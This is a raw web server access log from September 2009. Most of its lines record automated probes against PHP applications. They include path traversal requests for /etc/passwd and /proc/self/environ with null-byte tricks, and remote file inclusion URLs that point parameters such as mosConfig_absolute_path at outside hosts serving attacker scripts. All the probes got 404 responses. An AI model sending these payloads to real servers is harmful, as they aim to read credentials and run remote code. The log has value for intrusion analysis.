88.157.45.177 - - [10/Sep/2009:19:00:18 -0500] "GET /logs//interna.php?meio=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""-"
88.157.45.177 - - [10/Sep/2009:19:00:18 -0500] "GET //interna.php?meio=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""-"
88.157.45.177 - - [10/Sep/2009:19:00:18 -0500] "GET /logs//interna.php?meio=./../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""-"
88.157.45.177 - - [10/Sep/2009:19:00:18 -0500] "GET //interna.php?meio=./../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-""-"
211.189.18.73 - - [10/Sep/2009:19:02:59 -0500] "GET /logs/access_log.1235088000/admin/editor2/spaw_control.class.php?spaw_root=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:19:03:00 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.189.18.73 - - [10/Sep/2009:19:03:00 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:19:03:44 -0500] "GET //includes/db_adodb.php?baseDir=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:19:03:44 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:19:03:44 -0500] "GET /logs/access_log.1244764800//includes/db_adodb.php?baseDir=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.106.114 - - [10/Sep/2009:19:04:38 -0500] "GET /logs/access_log.1154131200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.72.216 - - [10/Sep/2009:19:08:14 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.122.72.216 - - [10/Sep/2009:19:08:14 -0500] "GET /logs/access_log.1237075200//bookmark4u/lostpasswd.php?env[include_prefix]=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.122.72.216 - - [10/Sep/2009:19:08:15 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.122.72.216 - - [10/Sep/2009:19:08:57 -0500] "GET /logs/access_log.1236902400//bookmark4u/lostpasswd.php?env[include_prefix]=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.122.72.216 - - [10/Sep/2009:19:08:57 -0500] "GET /logs/access_log.1247702400//bookmark4u/lostpasswd.php?env[include_prefix]=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
199.120.90.223 - - [10/Sep/2009:19:09:07 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
199.120.90.223 - - [10/Sep/2009:19:09:07 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
199.120.90.223 - - [10/Sep/2009:19:09:07 -0500] "GET /logs/access_log.1250985600//phpsecurityadmin/include/logout.php?PSA_PATH=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:19:09:25 -0500] "GET /logs/access_log.1243987200//includes/db_adodb.php?baseDir=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
72.44.187.42 - - [10/Sep/2009:19:09:49 -0500] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
72.44.187.42 - - [10/Sep/2009:19:09:49 -0500] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
222.236.47.188 - - [10/Sep/2009:19:10:34 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
222.236.47.188 - - [10/Sep/2009:19:10:34 -0500] "GET /logs/access_log.1237075200//include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
222.236.47.188 - - [10/Sep/2009:19:10:35 -0500] "GET //include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.188 - - [10/Sep/2009:19:10:57 -0500] "GET /logs/access_log.1236038400//include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
110.45.144.100 - - [10/Sep/2009:19:11:07 -0500] "GET /logs/access_log.1242691200//includes/db_adodb.php?baseDir=http://125.251.142.142/zboard/bjork/1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
199.120.90.223 - - [10/Sep/2009:19:11:32 -0500] "GET /logs/access_log.1248134400//phpsecurityadmin/include/logout.php?PSA_PATH=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.55.207.135 - - [10/Sep/2009:19:12:07 -0500] "GET /logs/access_log.1152489600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.175.25.226 - - [10/Sep/2009:19:13:51 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:19:13:51 -0500] "GET //guestbook1//admin.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:19:13:51 -0500] "GET /logs//guestbook1//admin.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
58.235.157.122 - - [10/Sep/2009:19:18:17 -0500] "GET //include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
58.235.157.122 - - [10/Sep/2009:19:18:17 -0500] "GET /logs//include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
58.235.157.122 - - [10/Sep/2009:19:18:17 -0500] "GET /logs/access_log.1237075200//include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:24 -0500] "GET //include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:24 -0500] "GET /logs//include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:25 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:25 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:27 -0500] "GET //include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:27 -0500] "GET /logs//include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:27 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
62.75.202.55 - - [10/Sep/2009:19:18:27 -0500] "GET /logs/access_log.1232928000//include/lib.inc.php?site_path=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
58.235.157.122 - - [10/Sep/2009:19:18:30 -0500] "GET /logs/access_log.1236038400//include/lib.inc.php?site_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
66.135.42.157 - - [10/Sep/2009:19:22:16 -0500] "GET /logs/port.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""-"
66.135.42.157 - - [10/Sep/2009:19:22:16 -0500] "GET /port.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""-"
65.55.207.118 - - [10/Sep/2009:19:25:07 -0500] "GET / HTTP/1.0" 200 3233 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
81.169.174.142 - - [10/Sep/2009:19:25:33 -0500] "GET /logs/access_log.1237334400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.169.174.142 - - [10/Sep/2009:19:25:33 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.169.174.142 - - [10/Sep/2009:19:25:34 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
211.110.11.75 - - [10/Sep/2009:19:25:46 -0500] "GET /phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:25:46 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:25:48 -0500] "GET /logs/access_log.1247356800/phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.169.174.142 - - [10/Sep/2009:19:25:50 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.169.174.142 - - [10/Sep/2009:19:25:50 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
81.169.174.142 - - [10/Sep/2009:19:25:50 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.desafiodotrader.com.br//cmdstate.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
81.169.174.142 - - [10/Sep/2009:19:25:51 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.desafiodotrader.com.br//cmdstate.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.110.11.75 - - [10/Sep/2009:19:25:55 -0500] "GET /logs/phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:25:55 -0500] "GET /logs/access_log.1247356800/phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:25:55 -0500] "GET /phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.135.42.157 - - [10/Sep/2009:19:25:55 -0500] "GET /index0.php?show=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
66.135.42.157 - - [10/Sep/2009:19:25:55 -0500] "GET /logs/index0.php?show=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
211.110.11.75 - - [10/Sep/2009:19:26:36 -0500] "GET /logs/access_log.1243296000/phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:26:58 -0500] "GET /logs/access_log.1243296000/phphtml.php?htmlclass_path=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:27:56 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:27:56 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:27:56 -0500] "GET /logs/access_log.1244419200/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:28:49 -0500] "GET /logs/access_log.1242000000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:29:11 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:29:11 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.110.11.75 - - [10/Sep/2009:19:29:11 -0500] "GET /logs/access_log.1244419200/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
66.135.42.157 - - [10/Sep/2009:19:29:52 -0500] "GET /home.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""-"
66.135.42.157 - - [10/Sep/2009:19:29:52 -0500] "GET /logs/home.php?content=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""-"
211.110.11.75 - - [10/Sep/2009:19:30:02 -0500] "GET /logs/access_log.1242000000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
81.169.174.142 - - [10/Sep/2009:19:32:45 -0500] "GET /logs/errors.php?error=http://www.desafiodotrader.com.br//cmdstate.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.169.174.142 - - [10/Sep/2009:19:32:45 -0500] "GET /errors.php?error=http://www.desafiodotrader.com.br//cmdstate.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
66.135.42.157 - - [10/Sep/2009:19:33:55 -0500] "GET /logs/index1.php?site=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
66.135.42.157 - - [10/Sep/2009:19:33:55 -0500] "GET /index1.php?site=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
66.135.42.157 - - [10/Sep/2009:19:37:58 -0500] "GET /index1.php?dat=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
66.135.42.157 - - [10/Sep/2009:19:37:58 -0500] "GET /logs/index1.php?dat=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
66.135.42.157 - - [10/Sep/2009:19:42:37 -0500] "GET /index2.php?DoAction=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
66.135.42.157 - - [10/Sep/2009:19:42:37 -0500] "GET /logs/index2.php?DoAction=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
41.222.192.69 - - [10/Sep/2009:19:49:30 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://siteprojects.byethost11.com/fx29id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
41.222.192.69 - - [10/Sep/2009:19:49:30 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://siteprojects.byethost11.com/fx29id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
41.222.192.69 - - [10/Sep/2009:19:49:30 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://siteprojects.byethost11.com/fx29id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
41.222.192.69 - - [10/Sep/2009:19:49:53 -0500] "GET /logs/access_log.1236211200//modules/vwar/admin/admin.php?vwar_root=http://siteprojects.byethost11.com/fx29id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
41.222.192.69 - - [10/Sep/2009:19:50:30 -0500] "GET /logs/access_log.1237075200//modules/vwar/admin/admin.php?vwar_root=http://siteprojects.byethost11.com/fx29id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.135.42.157 - - [10/Sep/2009:19:51:03 -0500] "GET /logs/index2.php?url_page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
66.135.42.157 - - [10/Sep/2009:19:51:03 -0500] "GET /index2.php?url_page=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
87.2.23.128 - - [10/Sep/2009:19:54:53 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
87.2.23.128 - - [10/Sep/2009:19:54:55 -0500] "GET /logs/access_log.1239148800 HTTP/1.1" 200 229376 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
208.82.42.209 - - [10/Sep/2009:19:55:33 -0500] "GET /logs/access_log.1243728000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hotlinkfiles.com/files/2740066_8utmr/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
208.82.42.209 - - [10/Sep/2009:19:55:33 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hotlinkfiles.com/files/2740066_8utmr/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
208.82.42.209 - - [10/Sep/2009:19:55:33 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hotlinkfiles.com/files/2740066_8utmr/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
208.82.42.209 - - [10/Sep/2009:19:55:45 -0500] "GET /logs/access_log.1242777600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hotlinkfiles.com/files/2740066_8utmr/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
66.135.42.157 - - [10/Sep/2009:19:58:19 -0500] "GET /index2.php?ID=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
66.135.42.157 - - [10/Sep/2009:19:58:19 -0500] "GET /logs/index2.php?ID=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
208.82.42.209 - - [10/Sep/2009:19:58:22 -0500] "GET /logs/access_log.1243036800/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hotlinkfiles.com/files/2740066_8utmr/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
87.2.23.128 - - [10/Sep/2009:19:59:25 -0500] "GET /logs/access_log.1238889600 HTTP/1.1" 200 229376 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
87.2.23.128 - - [10/Sep/2009:19:59:44 -0500] "GET /logs/access_log.1238716800 HTTP/1.1" 200 181179 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
92.61.146.92 - - [10/Sep/2009:20:00:26 -0500] "GET /logs/access_log.1228694400//errors.php?error=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
92.61.146.92 - - [10/Sep/2009:20:00:26 -0500] "GET //errors.php?error=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
92.61.146.92 - - [10/Sep/2009:20:00:26 -0500] "GET /logs//errors.php?error=http://www.tecnicsuport.com/dades/gestiobanners/special.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
80.67.26.96 - - [10/Sep/2009:20:00:51 -0500] "GET /logs/access_log.1241222400//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
80.67.26.96 - - [10/Sep/2009:20:00:55 -0500] "GET /logs/access_log.1240012800//modules/Forums/admin/admin_words.php?phpbb_root_path=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.207.25 - - [10/Sep/2009:20:01:37 -0500] "GET /logs/access_log.1224633600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.206 - - [10/Sep/2009:20:04:08 -0500] "GET /logs/access_log.1200268800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.192 - - [10/Sep/2009:20:06:37 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.236.47.192 - - [10/Sep/2009:20:06:37 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.192 - - [10/Sep/2009:20:06:37 -0500] "GET //admin/include/lib.module.php?mod_root=http://www.rankkuwait.com/rankmail/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.44.187.42 - - [10/Sep/2009:20:08:03 -0500] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
72.44.187.42 - - [10/Sep/2009:20:08:07 -0500] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://reg1.rmutl.ac.th/con/con?%0D?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
66.135.42.157 - - [10/Sep/2009:20:08:20 -0500] "GET /logs/index2.php?ascii_seite=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
66.135.42.157 - - [10/Sep/2009:20:08:20 -0500] "GET /index2.php?ascii_seite=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
65.55.207.96 - - [10/Sep/2009:20:08:37 -0500] "GET /logs/access_log.1132790400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.182 - - [10/Sep/2009:20:10:38 -0500] "GET /logs/access_log.1163980800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.121 - - [10/Sep/2009:20:13:37 -0500] "GET /logs/access_log.1201651200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [10/Sep/2009:20:14:24 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:14:24 -0500] "GET /logs/access_log.1244764800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:14:24 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:14:24 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:14:25 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:14:25 -0500] "GET /logs/access_log.1244764800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
66.135.42.157 - - [10/Sep/2009:20:15:48 -0500] "GET /logs/index2.php?showpage=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
66.135.42.157 - - [10/Sep/2009:20:15:48 -0500] "GET /index2.php?showpage=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
69.175.25.226 - - [10/Sep/2009:20:16:31 -0500] "GET /logs//include/lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:20:16:31 -0500] "GET //include/lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.175.25.226 - - [10/Sep/2009:20:16:31 -0500] "GET /logs/access_log.1237075200//include/lib.inc.php?site_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
201.76.47.203 - - [10/Sep/2009:20:16:39 -0500] "GET /logs/errors.php?error=http://www.desafiodotrader.com.br//cmdstate.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
201.76.47.203 - - [10/Sep/2009:20:16:39 -0500] "GET /errors.php?error=http://www.desafiodotrader.com.br//cmdstate.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
218.38.136.251 - - [10/Sep/2009:20:17:13 -0500] "GET /logs/access_log.1241740800//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:13 -0500] "GET /logs/access_log.1239667200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:13 -0500] "GET /logs/access_log.1243123200//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.136.251 - - [10/Sep/2009:20:17:13 -0500] "GET /logs/access_log.1243382400//agendax/addevent.inc.php?agendax_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
